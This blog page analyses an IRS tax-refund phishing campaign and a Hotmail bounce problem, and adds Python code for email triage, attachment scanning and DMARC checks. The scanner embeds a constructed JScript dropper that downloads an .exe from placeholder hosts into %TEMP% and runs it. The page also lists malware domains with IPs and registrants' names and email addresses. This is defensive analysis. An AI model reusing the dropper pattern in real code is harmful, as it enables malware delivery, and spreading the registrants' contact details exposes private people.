Showing posts with label gmail. Show all posts

Tuesday, September 15, 2015

An IRS tax refund phishing scam illustrates the widespread failure of hosting and antivirus providers' security measures

Scams focused on stealing tax refunds remain highly profitable, despite the fact that they have been well known and understood by security professionals and the general public for years. A variety of distribution methods are used, with the common threads being the use of IRS logos and bureaucratic-sounding language to convince users to click a link, download and execute a file and/or send personally identifying information like a Social Security number. A recent example of one such scam that I came across is a damning illustration of the failure of online service providers to protect users from obvious and simple malware distribution methods.

In the example I wish to discuss today, the distribution method was a spam email that, on a small ISP's installation of SpamAssassin (note: I am not an admin or employee of this system; I'm a customer), received an X-Spam-Status score of 5.3 after matching the following tests:

X-Spam-Status: No, score=5.3 required=10.0 tests=AM_TRUNCATED,CK_419SIZE,
 CK_KARD_SIZE,ENV_FROM_DIFF,ENV_FROM_DIFF0,FROM_SECURITY,HAS_REPLY_TO,
 HEADER_FROM_DIFFERENT_DOMAINS,JUNKE_IXHASH,LINK_NR_TOP,MAILPHISH_REPLYTO,
 PSTOCK_PART,TO_NOREAL,XPRIO,ZIP_ATTACH shortcircuit=no
 autolearn=disabled version=3.4.0

While the default SpamAssassin threshold for marking a message as spam is 5.0, few admins leave this default value. SpamAssassin's own documentation for the required_score setting calls 5.0 aggressive, suitable for a single-user setup, and suggests that an ISP use something more conservative like 8.0 or 10.0. I don't have this ISP's SpamAssassin configuration, but it has obviously been customized (the header shows required=10.0). My point here isn't to take issue with SpamAssassin, which I have used for many years, but to demonstrate how this message made its way to mailboxes through pretty solid security software despite these being included in the headers:

From: "Internal Revenue Service" <office@irs.gov> 
Reply-To: "Internal Revenue Service" <office@irs.gov>  
Return-Path: <servers@abitindia.com>
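The mismatch between those three headers is exactly the kind of thing a gateway can act on locally without touching the SpamAssassin threshold. The following Python is an added example, not code from the post or from the ISP in question. The sample message is constructed from the headers quoted above (the To:, Subject: and body lines are placeholders). It parses the folded X-Spam-Status header, compares the score against both the configured threshold and a stricter local one, and then applies the check this setup lacked: a From: that claims a protected domain (irs.gov here) while the envelope sender in Return-Path belongs to somebody else. The protected-domain list and the 5.0 local threshold are assumptions for the example.

```python
import re
from email import message_from_bytes
from email.utils import parseaddr

# Constructed sample: the headers quoted in the post, assembled into a minimal message.
# The To:, Subject: and body lines are placeholders, not taken from the real mail.
SAMPLE = b"""Return-Path: <servers@abitindia.com>
X-Spam-Status: No, score=5.3 required=10.0 tests=AM_TRUNCATED,CK_419SIZE,
 CK_KARD_SIZE,ENV_FROM_DIFF,ENV_FROM_DIFF0,FROM_SECURITY,HAS_REPLY_TO,
 HEADER_FROM_DIFFERENT_DOMAINS,JUNKE_IXHASH,LINK_NR_TOP,MAILPHISH_REPLYTO,
 PSTOCK_PART,TO_NOREAL,XPRIO,ZIP_ATTACH shortcircuit=no
 autolearn=disabled version=3.4.0
X-Virus-Status: Clean
From: "Internal Revenue Service" <office@irs.gov>
Reply-To: "Internal Revenue Service" <office@irs.gov>
To: victim@example.net
Subject: Tax refund notification

(body omitted)
"""

# Domains that should never show up in From: with a foreign envelope sender.
# irs.gov is the one impersonated in the post; the list itself is an assumption.
PROTECTED_DOMAINS = {"irs.gov"}

# SpamAssassin tests that indicate a delivery mechanism rather than spammy wording.
PAYLOAD_TESTS = {"ZIP_ATTACH"}


def parse_spam_status(value):
    """Parse a (possibly folded) X-Spam-Status header into score, threshold and test list."""
    flat = " ".join(value.split())  # unfold: collapse newline + indentation to one space
    score = float(re.search(r"score=(-?[\d.]+)", flat).group(1))
    required = float(re.search(r"required=([\d.]+)", flat).group(1))
    # Test names are upper case; stop at the next lower-case key=value pair (shortcircuit=, ...).
    m = re.search(r"tests=(.*?)(?:\s+[a-z_]+=|$)", flat)
    tests = [t.strip() for t in m.group(1).split(",") if t.strip()] if m else []
    return {"score": score, "required": required, "tests": tests}


def domain_of(header_value):
    """Lower-cased domain of the first address in a header, or '' if there is none."""
    _, addr = parseaddr(header_value or "")
    return addr.rpartition("@")[2].lower()


def triage(raw, local_threshold=5.0):
    """Re-score a message locally: SpamAssassin's verdict plus an impersonation check."""
    msg = message_from_bytes(raw)
    status = parse_spam_status(msg.get("X-Spam-Status", "score=0 required=0 tests="))
    from_domain = domain_of(msg.get("From"))
    envelope_domain = domain_of(msg.get("Return-Path"))  # '' (missing) counts as a mismatch
    reply_domain = domain_of(msg.get("Reply-To")) or from_domain

    reasons = []
    if status["score"] >= status["required"]:
        reasons.append("SpamAssassin threshold reached")
    elif status["score"] >= local_threshold:
        reasons.append("local threshold %.1f reached" % local_threshold)
    impersonated = from_domain in PROTECTED_DOMAINS and envelope_domain != from_domain
    if impersonated:
        reasons.append("From claims %s but envelope sender is %s" % (from_domain, envelope_domain))
        if PAYLOAD_TESTS & set(status["tests"]):
            reasons.append("archive attachment on an impersonated sender")

    return {
        **status,
        "from_domain": from_domain,
        "envelope_domain": envelope_domain,
        "reply_domain": reply_domain,
        "spamassassin_flagged": status["score"] >= status["required"],
        "impersonated": impersonated,
        "quarantine": impersonated or status["score"] >= local_threshold,
        "reasons": reasons,
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print("%-22s %s" % (key, value))
```

Against the sample this reports score 5.3 under a required of 10.0, so SpamAssassin did not flag it, but the irs.gov/abitindia.com mismatch together with ZIP_ATTACH quarantines it regardless of threshold. Note that ENV_FROM_DIFF and HEADER_FROM_DIFFERENT_DOMAINS already fired; the in-product equivalent of this check is a `score` line in local.cf that raises those tests enough to matter.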

Here's another depressing bonus. In addition to SpamAssassin, the recipient mail server had ClamAV installed. The message had a .ZIP attachment, and the mail server's ClamAV install marked it as clean:

X-Virus-Scanned: clamav-milter 0.98.7 at mx1.riseup.net
X-Virus-Status: Clean


The attachment does in fact contain a malicious JavaScript file, and ClamAV is not alone in failing to pick it up. According to VirusTotal, 31 out of 56 AV engines failed to detect this file, including Symantec, Trend Micro, Panda, Malwarebytes, Avast and Avira. In defense of these AV heavyweights, the file used a single basic obfuscation function to disguise its purpose, which at the moment is apparently enough to fool these packages.


One round through Einar Lielmanis' JS Beautifier later, and we have this:


The script creates an EXE file under a random name in the %TEMP% directory (usually something like C:\Users\UserName\AppData\Local\Temp) and fills it with whatever it retrieves from one of the three domains listed: dickinsonwrestlingclub.com, syscomm.smartlanka.net or les-eglantiers.fr.
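A gateway does not need a signature to be suspicious of that attachment; the archive's contents and the script's API usage are enough. The following Python is an added example, not code from the post: it opens a ZIP in memory without executing anything, flags script extensions, double extensions and encrypted entries, and greps script contents for the pattern described above (WScript.Shell, %TEMP% expansion, an XMLHTTP download, an ADODB.Stream write, .Run). The embedded JScript is written here to exercise the scanner and mirrors the described behaviour; it is not the actual sample, and its host names (RFC 2606 .invalid) and the file name IRS_Refund_Notice_2015.pdf.js are placeholders. The indicator weights and the block threshold are assumptions.

```python
import io
import re
import zipfile

# Constructed sample: a JScript dropper with the behaviour the post describes
# (random-named .exe in %TEMP%, content fetched from one of several hosts).
# Written for this example only; hosts are placeholders and do not resolve.
SAMPLE_JS = r"""
var hosts = ["dropper-a.invalid", "dropper-b.invalid", "dropper-c.invalid"];
var sh = new ActiveXObject("WScript.Shell");
var tmp = sh.ExpandEnvironmentStrings("%TEMP%");
var name = tmp + "\\" + Math.random().toString(36).substring(2) + ".exe";
for (var i = 0; i < hosts.length; i++) {
    var x = new ActiveXObject("MSXML2.XMLHTTP");
    x.open("GET", "http://" + hosts[i] + "/counter/?id=1", false);
    x.send();
    if (x.status == 200) {
        var s = new ActiveXObject("ADODB.Stream");
        s.Open(); s.Type = 1; s.Write(x.responseBody); s.SaveToFile(name, 2); s.Close();
        sh.Run(name, 0, false);
        break;
    }
}
"""

# Extensions Windows will execute or hand to the script host on double-click.
SCRIPT_EXTENSIONS = (".js", ".jse", ".wsf", ".vbs", ".vbe", ".hta", ".cmd", ".bat", ".scr", ".exe")

# (label, regex, weight): indicators of a JScript/VBScript download-and-run dropper.
INDICATORS = [
    ("shell object",        r"ActiveXObject\s*\(\s*['\"]WScript\.Shell", 2),
    ("temp dir expansion",  r"ExpandEnvironmentStrings|%TEMP%", 2),
    ("http client",         r"MSXML2\.XMLHTTP|Microsoft\.XMLHTTP|WinHttp\.WinHttpRequest", 2),
    ("binary stream write", r"ADODB\.Stream", 2),
    ("writes .exe",         r"\.exe\b", 1),
    ("executes file",       r"\.Run\s*\(|\.ShellExecute\s*\(", 3),
    ("runtime eval",        r"\beval\s*\(|String\.fromCharCode|unescape\s*\(", 1),
    ("multiple hosts",      r"\[\s*\"[^\"]+\"\s*(?:,\s*\"[^\"]+\"\s*){2,}\]", 1),
]


def scan_script(text):
    """Match the indicator list against script text; returns labels hit and a total weight."""
    hits = [(label, w) for label, pat, w in INDICATORS if re.search(pat, text, re.IGNORECASE)]
    return {"indicators": [label for label, _ in hits], "score": sum(w for _, w in hits)}


def scan_zip(data, block_threshold=6):
    """Inspect every entry of a ZIP attachment without executing anything."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            lower = info.filename.lower()
            entry = {
                "name": info.filename,
                "encrypted": bool(info.flag_bits & 0x1),   # password-protected: no scanner sees inside
                "script": lower.endswith(SCRIPT_EXTENSIONS),
                "double_extension": lower.count(".") >= 2 and lower.endswith(SCRIPT_EXTENSIONS),
                "indicators": [],
                "score": 0,
            }
            if entry["encrypted"]:
                entry["score"] += 3            # opacity is itself the signal
            elif entry["script"] and info.file_size < 2_000_000:
                result = scan_script(zf.read(info.filename).decode("utf-8", "replace"))
                entry["indicators"] = result["indicators"]
                entry["score"] += result["score"]
            if entry["double_extension"]:
                entry["score"] += 2            # invoice.pdf.js style name hiding
            entry["verdict"] = "block" if entry["score"] >= block_threshold else "allow"
            findings.append(entry)
    return findings


def build_sample_zip():
    """Pack the constructed dropper the way the phishing mail did: one script inside a ZIP."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("IRS_Refund_Notice_2015.pdf.js", SAMPLE_JS)
    return buf.getvalue()


if __name__ == "__main__":
    for finding in scan_zip(build_sample_zip()):
        print(finding)
```

The individual indicators are all found in legitimate admin scripts; it is the combination of writing to %TEMP% and calling .Run on the result that carries the weight here. An encrypted archive is scored on its opacity alone, since a "Clean" result from ClamAV or anyone else on a file that cannot be read means nothing.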

There are a number of domains and hosts associated with this scam.



Malware domains

dickinsonwrestlingclub.com
  IP: 72.20.64.58
  Host: Consolidated Telcom
  Registrant: Perfect Privacy, LLC
  Contact: N/A
  Name server IPs: 72.20.64.11, 72.20.64.12

syscomm.smartlanka.net
  IP: 69.89.31.73
  Host: box273.bluehost.com / Bluehost / Unified Layer
  Registrant: Dilhan Seneviratne
  Contact: prabhath247@gmail.com
  Name server IPs: 74.220.195.31, 69.89.16.4

les-eglantiers.fr
  IP: 76.74.242.190
  Host: hp92.hostpapa.com / Peer 1 Network / Cogeco
  Registrant: John Huisman / Camping Beau Rivag
  Contact: huisman.huisman@orange.fr
  Name server IPs: 69.90.36.133, 204.15.193.53



Spam domains

abitindia.com
  IP: 54.165.102.41
  Host: Amazon EC2
  Email provider: Gmail
  Contact: accounts@abitindia.com
  Name server IPs: 50.23.136.229, 50.23.75.96, 162.251.82.118, 184.173.150.57

mail.netspaceindia.com
  IP: 74.54.133.186
  Host: The Planet
  Email provider: N/A
  Contact: help@netspaceindia.com
  Name server IPs: 205.251.196.41, 205.251.192.135, 205.251.199.124, 205.251.195.214

netspaceindia.com
  IP: 104.131.68.147
  Host: Digital Ocean
  Email provider: N/A
  Contact: help@netspaceindia.com
  Name server IPs: 205.251.196.41, 205.251.192.135, 205.251.199.124, 205.251.195.214



Taking a look at the hosts involved in this scam provides even further disappointment. abitindia.com, whose email is managed by Gmail, provides the Return-Path (the envelope sender) for the spam messages but not the Reply-To. Replies, incredibly, go directly to the IRS support email address. The envelope sender is commonly forged so that backscatter (bounces and auto-replies) lands on some random sucker. Not here: the Return-Path domain abitindia.com is affiliated with the sender domain netspaceindia.com:

Domain Name: ABITINDIA.COM
Updated Date: 2014-11-24T05:21:07Z
Creation Date: 2006-11-23T19:31:19Z
Registrar Registration Expiration Date: 2015-11-23T19:31:19Z
Registrar: PDR Ltd. d/b/a PublicDomainRegistry.com
Registrar IANA ID: 303
Registrant Name: Netspaceindia
Registrant Organization: Netspaceindia
Registrant Street: Hall no 3, Wing B, Parshuram apt Above Woodlands Showroom College Road Nashik
Registrant City: Nashik
Registrant State/Province: Maharashtra
Registrant Postal Code: 422005
Registrant Country: IN
Registrant Phone: +91.9975444464
Registrant Email: accounts@abitindia.com
Name Server: dns1.netspaceindia.com
Name Server: dns2.netspaceindia.com
Name Server: dns3.netspaceindia.com
Name Server: dns4.netspaceindia.com


In other words, in many circumstances backscatter recipients are innocent victims. That is not the case here: the sender controls the backscatter recipient address, most likely to keep its mailing lists updated, since bounces tell the spammer which addresses are dead. As such, Google could play a role in putting a stop to this scam. A review of the backscatter would make the relationship between sender and backscatter recipient obvious and, in an ideal world, would precipitate the suspension of the Google Apps account for "abitindia.com".

To be fair, Google's responsibility here is minimal, particularly when compared to the role that every other hosting provider plays in this. The Planet and Digital Ocean are providing the infrastructure for the spam campaign, while Bluehost, Cogeco and Consolidated Telcom are providing the infrastructure for hosting the malware. It's likely that the accounts with these providers were created using fraudulent or stolen payment information, or that legitimate accounts were compromised. This sort of thing is an everyday occurrence for hosting providers; for providers who do not invest in abuse response, these types of scams can use the same accounts with the same hosting providers for months if not years. When I come across this sort of scam, I do my best to inform the hosting providers involved using the abuse contact information that is required to be associated with IP and DNS registrations, along with enough evidence for the provider to confirm I'm not a nut. It is unusual to receive a response and even more unusual to receive a non-automated response. It is just as unusual for hosting provider staff to review their abuse@ contacts, let alone resolve the issues they receive.

Hemming and hawing over the need for state intervention to prevent "cyber-attacks" (vomit) and scams like the ones described here is all over the place. Many of those who support such a view justify government intervention by pointing to the incredible sophistication and technical complexity of the scams that plague internet users. However, the overwhelming majority of the scams I have encountered over the course of my career involved well known techniques and software. There is significant room for improvement in security practice simply by applying what we already know: like how to prevent (or rapidly stop) a 30 year old scam using 20 year old spam techniques to circulate 10 year old malware.

Tuesday, July 28, 2015

Hotmail is bouncing bugtraq mailing list emails from Yahoo

What really irks me about this is that I deliberately use gigantic, stupid MTAs like gmail and live mail to deliberately avoid this sort of garbage (deliberately). Those familiar with administering high-volume email can appreciate that you can perfectly configure your mail server and still end up bouncing all over the place, because almost everyone with a mail server is not an actual email administrator and has no clue what they are doing. Email, like high school, is ultimately all about popularity. Even the least competent of email server owners will eventually get tech support to make sure Google and Microsoft can deliver to and receive from their Zimbra abomination.

At least that's what I figured until I started getting bounces like the one below. It seems Microsoft has decided that Security Focus mailing lists are too dangerous. To step up the oddity of this policy, bounces only occur when the originating MTA is with Yahoo. I can receive email directly from securityfocus.com. I can receive email from securityfocus.com when the originating mail server is a one-off IP address from Finland that is part of a DSL netblock. But Yahoo is a bridge too far. Stupid stupid stupid.

Return-Path: <>
Received: (qmail 22048 invoked from network); 15 Jul 2015 15:26:46 -0000
Received: from sf01mail1.securityfocus.com (HELO mail.securityfocus.com) (192.168.120.35)
by lists.securityfocus.com with SMTP; 15 Jul 2015 15:26:46 -0000
Received: (qmail 27445 invoked by alias); 15 Jul 2015 15:26:31 -0000
Received: (qmail 21710 invoked from network); 15 Jul 2015 15:26:06 -0000
Received: from sf01smtp2.securityfocus.com (192.168.120.34)
by mail.securityfocus.com with SMTP; 15 Jul 2015 15:26:06 -0000
Received: by sf01smtp2.securityfocus.com (Postfix)
id E771981455; Wed, 15 Jul 2015 10:31:59 -0700 (PDT)
Date: Wed, 15 Jul 2015 10:31:59 -0700 (PDT)
From: MAILER-DAEMON@securityfocus.com (Mail Delivery System)
Subject: Undelivered Mail Returned to Sender
To: bugtraq-return-55766-(redacted)=live.com@securityfocus.com
Auto-Submitted: auto-replied
MIME-Version: 1.0
Content-Type: multipart/report; report-type=delivery-status;
boundary="5D865812F6.1436981490/sf01smtp2.securityfocus.com"
Content-Transfer-Encoding: 8bit
Message-Id: <20150715173159.E771981455@sf01smtp2.securityfocus.com>

This is a MIME-encapsulated message.

--5D865812F6.1436981490/sf01smtp2.securityfocus.com
Content-Description: Notification
Content-Type: text/plain; charset=us-ascii

This is the mail system at host sf01smtp2.securityfocus.com.

I'm sorry to have to inform you that your message could not
be delivered to one or more recipients. It's attached below.

For further assistance, please send mail to postmaster

If you do so, please include this problem report. You can
delete your own text from the attached returned message.

The mail system

<(redacted)@live.com>: host mx4.hotmail.com[65.55.92.152] said: 550 5.7.0
(SNT004-MC2F10) Unfortunately, messages from (143.127.139.113) on behalf of
(yahoo.com) could not be delivered due to domain owner policy restrictions.
(in reply to end of DATA command)

--5D865812F6.1436981490/sf01smtp2.securityfocus.com
Content-Description: Delivery report
Content-Type: message/delivery-status

Reporting-MTA: dns; sf01smtp2.securityfocus.com
X-Postfix-Queue-ID: 5D865812F6
X-Postfix-Sender: rfc822; (redacted)@securityfocus.com
Arrival-Date: Wed, 15 Jul 2015 10:18:42 -0700 (PDT)

Final-Recipient: rfc822; (redacted)@live.com
Action: failed
Status: 5.7.0
Remote-MTA: dns; mx4.hotmail.com
Diagnostic-Code: smtp; 550 5.7.0 (SNT004-MC2F10) Unfortunately, messages from
(143.127.139.113) on behalf of (yahoo.com) could not be delivered due to
domain owner policy restrictions.

--5D865812F6.1436981490/sf01smtp2.securityfocus.com
Content-Description: Undelivered Message
Content-Type: message/rfc822
Content-Transfer-Encoding: 8bit

Received: from lists.securityfocus.com (lists.securityfocus.com [192.168.120.36])
by sf01smtp2.securityfocus.com (Postfix) with QMQP
id 5D865812F6; Wed, 15 Jul 2015 10:18:42 -0700 (PDT)
Precedence: bulk
(redacted)
Delivered-To: mailing list (redacted)@securityfocus.com
Delivered-To: moderator for (redacted)@securityfocus.com
Received: (qmail 9417 invoked from network); 15 Jul 2015 10:14:32 -0000
Date: Wed, 15 Jul 2015 10:14:31 GMT
Message-Id: <201507151014.t6faevnw013232@sf01web2.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: (redacted)@yahoo.com
To: (redacted)@securityfocus.com
Subject: XSS vulnerability in OFBiz forms
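The 550 text in that DSN ("messages from (143.127.139.113) on behalf of (yahoo.com) could not be delivered due to domain owner policy restrictions") is the wording Hotmail/Outlook.com returns when a message fails DMARC against the policy the From: domain publishes, and yahoo.com has published p=reject since 2014. That fits what the post observes: the list resends a yahoo.com From: under its own envelope sender (the X-Postfix-Sender above is @securityfocus.com), so SPF no longer aligns with the From: domain, and once the list's edits break the yahoo.com DKIM signature there is nothing left for DMARC to pass on. The following Python is an added example, not code from the post or from SecurityFocus. It parses the DSN into its RFC 3464 fields and then evaluates DMARC alignment for the direct and relayed cases. The policy record is an assumed stand-in for Yahoo's, the organizational-domain check ignores the public suffix list, and the DKIM failure in the relayed case is assumed rather than shown by the bounce.

```python
import re
from email import message_from_string

# Constructed from the DSN quoted above: the delivery-status part and the 550 text,
# wrapped in a minimal multipart/report so the parser has a real structure to walk.
BOUNCE = """From: MAILER-DAEMON@securityfocus.com (Mail Delivery System)
Subject: Undelivered Mail Returned to Sender
MIME-Version: 1.0
Content-Type: multipart/report; report-type=delivery-status; boundary="B1"

--B1
Content-Type: text/plain; charset=us-ascii

This is the mail system at host sf01smtp2.securityfocus.com.

--B1
Content-Type: message/delivery-status

Reporting-MTA: dns; sf01smtp2.securityfocus.com
X-Postfix-Queue-ID: 5D865812F6

Final-Recipient: rfc822; redacted@live.com
Action: failed
Status: 5.7.0
Remote-MTA: dns; mx4.hotmail.com
Diagnostic-Code: smtp; 550 5.7.0 (SNT004-MC2F10) Unfortunately, messages from
 (143.127.139.113) on behalf of (yahoo.com) could not be delivered due to
 domain owner policy restrictions.

--B1--
"""

# Assumed record standing in for the p=reject policy yahoo.com publishes.
POLICY = "v=DMARC1; p=reject"


def _flat(value):
    return " ".join((value or "").split())  # unfold continuation lines


def _dsn_value(block, name):
    """RFC 3464 fields read 'type; value'; return only the value part."""
    return _flat(block.get(name, "")).partition(";")[2].strip()


def parse_dsn(raw):
    """Pull the per-recipient failure details out of a multipart/report bounce."""
    msg = message_from_string(raw)
    report = {"reporting_mta": None, "recipients": []}
    for part in msg.walk():
        if part.get_content_type() != "message/delivery-status":
            continue
        # The stdlib parser represents this part as a list of header blocks:
        # one per-message block followed by one block per recipient.
        blocks = [b for b in part.get_payload() if b.items()]
        report["reporting_mta"] = _dsn_value(blocks[0], "Reporting-MTA")
        for blk in blocks[1:]:
            diag = _dsn_value(blk, "Diagnostic-Code")
            m = re.search(r"messages from \(([\d.]+)\) on behalf of \(([^)]+)\)", diag)
            report["recipients"].append({
                "recipient": _dsn_value(blk, "Final-Recipient"),
                "action": blk.get("Action"),
                "status": blk.get("Status"),
                "remote_mta": _dsn_value(blk, "Remote-MTA"),
                "diagnostic": diag,
                "relay_ip": m.group(1) if m else None,      # the MTA Hotmail actually talked to
                "on_behalf_of": m.group(2) if m else None,  # the From: domain whose policy applied
            })
        break
    return report


def parse_dmarc(record):
    tags = dict(kv.strip().split("=", 1) for kv in record.split(";") if "=" in kv)
    return {"p": tags.get("p", "none"), "aspf": tags.get("aspf", "r"), "adkim": tags.get("adkim", "r")}


def _org(domain):
    return ".".join(domain.lower().split(".")[-2:])  # simplification: no public suffix list


def _aligned(authenticated, from_domain, mode):
    if mode == "s":
        return authenticated.lower() == from_domain.lower()
    return _org(authenticated) == _org(from_domain)


def dmarc_disposition(from_domain, record, spf, dkim):
    """spf=(result, envelope-sender domain); dkim=(result, d= domain). Returns (auth, disposition)."""
    pol = parse_dmarc(record)
    spf_ok = spf[0] == "pass" and _aligned(spf[1], from_domain, pol["aspf"])
    dkim_ok = dkim[0] == "pass" and _aligned(dkim[1], from_domain, pol["adkim"])
    if spf_ok or dkim_ok:
        return "pass", "deliver"
    return "fail", {"none": "deliver", "quarantine": "quarantine", "reject": "reject"}[pol["p"]]


def mailing_list_cases():
    """The same yahoo.com-authored post, sent direct and after relaying through a list."""
    # Sent by Yahoo's own MTA: SPF and DKIM both pass and both align with the From: domain.
    direct = dmarc_disposition("yahoo.com", POLICY, ("pass", "yahoo.com"), ("pass", "yahoo.com"))
    # Relayed by the list under its own envelope sender: SPF passes for securityfocus.com but does
    # not align, and (assumed) the list's edits invalidate Yahoo's DKIM signature.
    relayed = dmarc_disposition("yahoo.com", POLICY, ("pass", "securityfocus.com"), ("fail", "yahoo.com"))
    # Same relay, but headers and body left untouched so the yahoo.com signature still verifies.
    relayed_intact = dmarc_disposition("yahoo.com", POLICY, ("pass", "securityfocus.com"), ("pass", "yahoo.com"))
    return direct, relayed, relayed_intact


if __name__ == "__main__":
    print(parse_dsn(BOUNCE))
    print(mailing_list_cases())
```

The third case is the one that matters operationally: a list that does not rewrite the subject or append a footer leaves the author's DKIM signature intact, and the relayed message passes DMARC through DKIM alone even though SPF no longer aligns. It also explains why the author's mail from a one-off Finnish DSL address gets through: that domain publishes no reject policy for Hotmail to enforce.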

Billing systems development now available

Good news for current and future clients of Josh Wieder Technical Consulting : customers can now retain a variety of unique services related...